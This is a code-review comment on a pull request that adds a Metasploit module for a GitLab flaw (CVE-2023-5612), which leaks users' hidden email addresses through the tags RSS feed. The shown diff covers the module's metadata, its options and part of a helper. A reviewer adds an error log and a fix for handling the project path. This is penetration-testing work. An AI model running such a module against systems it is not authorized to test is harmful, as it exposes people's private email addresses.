modules/auxiliary/gather/gitlab_tags_rss_feed_email_disclosure.rb

```diff
@@ -0,0 +1,126 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'GitLab Tags RSS feed email disclosure',
+        'Description' => %q{
+          An issue has been discovered in GitLab affecting all versions
+          before 16.6.6, 16.7 prior to 16.7.4, and 16.8 prior to 16.8.1.
+          It is possible to read the user email address via tags feed
+          although the visibility in the user profile has been disabled.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'n00bhaxor', # msf module
+          'erruquill' # HackerOne Bug Bounty, analysis
+        ],
+        'References' => [
+          [ 'URL', 'https://about.gitlab.com/releases/2024/01/25/critical-security-release-gitlab-16-8-1-released/' ],
+          [ 'URL', 'https://hackerone.com/reports/2208790'],
+          [ 'CVE', '2023-5612']
+        ],
+        'DisclosureDate' => '2024-01-25',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [ true, 'The URI of the GitLab Application', '/']),
+        OptString.new('TARGETPROJECT', [ false, 'Workspace and project to target', nil])
+      ]
+    )
+  end
+
+  def get_contents(tags)
+    vprint_status('Check RSS tags feed for: ' + tags)
+
+    # Tag needs to be lower case, so...
+    tags = "#{tags.split('/')[0]}/#{tags.split('/')[1].downcase}"
```

Comment:
I didn't realize that the `TARGETPROJECT` options is not supposed to start with a `/`. 

I was getting the following error because of how the tags were getting split on `/`. 
```
msf6 auxiliary(gather/gitlab_tags_rss_feed_email_disclosure) > run
[*] Running module against 127.0.0.1

[*] Check RSS tags feed for: /root/public_project
[-] Auxiliary aborted due to failure: unexpected-reply: 127.0.0.1:6780 - Project does not exist or is not public (response code: 302)
[*] Auxiliary module execution completed
```

This is a quick fix for the issue
```suggestion
    tags.sub!(/^\//, '') if tags.start_with?("/")
    tags = "#{tags.split('/')[0]}/#{tags.split('/')[1].downcase}"
```